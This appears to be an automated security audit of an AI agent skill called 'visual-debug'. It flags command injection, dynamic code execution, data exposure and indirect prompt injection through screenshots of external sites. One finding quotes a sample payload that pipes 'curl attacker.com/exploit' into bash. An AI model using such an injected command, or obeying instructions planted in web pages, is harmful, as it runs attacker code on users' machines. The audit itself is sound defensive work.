visual-debug
Fail
Audited by Gen Agent Trust Hub on May 14, 2026
Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The scripts
scripts/section-compare.shandscripts/transition-compare.shextract element IDs and CSS class names from analyzed web pages and use them as filenames in shell commands. These commands are executed usingsubprocess.run(shell=True)in a Python sub-process. The sanitization performed (replacing slashes and spaces) is insufficient to prevent command injection. A malicious website could use an ID like "curl attacker.com/exploit | bash" to execute arbitrary shell commands on the user's host during the screenshot capture process.\n- [REMOTE_CODE_EXECUTION]: The skill frequently uses 'python3 -c' and 'node -e' to generate and execute logic on the fly via string interpolation. It also injects large blocks of JavaScript into browser sessions usingagent-browser eval. This pattern of dynamic execution of generated strings significantly increases the risk of unintended code execution, especially when handling data derived from external, untrusted web sources.\n- [DATA_EXFILTRATION]: As part of its core function, the skill captures screenshots, video frames, and DOM snapshots from target URLs and stores them in the localtmp/ref/directory. This process can inadvertently harvest sensitive data such as session tokens, personally identifiable information (PII), or private content visible on the page. While the skill includes instructions for manual cleanup, the temporary storage of unencrypted sensitive data on the file system represents a risk of data exposure.\n- [PROMPT_INJECTION]: The mandatory visual verification workflow (Phase E) requires the LLM to inspect and compare screenshots from external sites. This creates a surface for indirect prompt injection. Malicious instructions or deceptive content rendered on the target website could influence the AI agent's decision-making or cause it to ignore its safety guidelines while it is 'reading' the implementation's visual output.
Recommendations
- AI detected serious security threats
Audit Metadata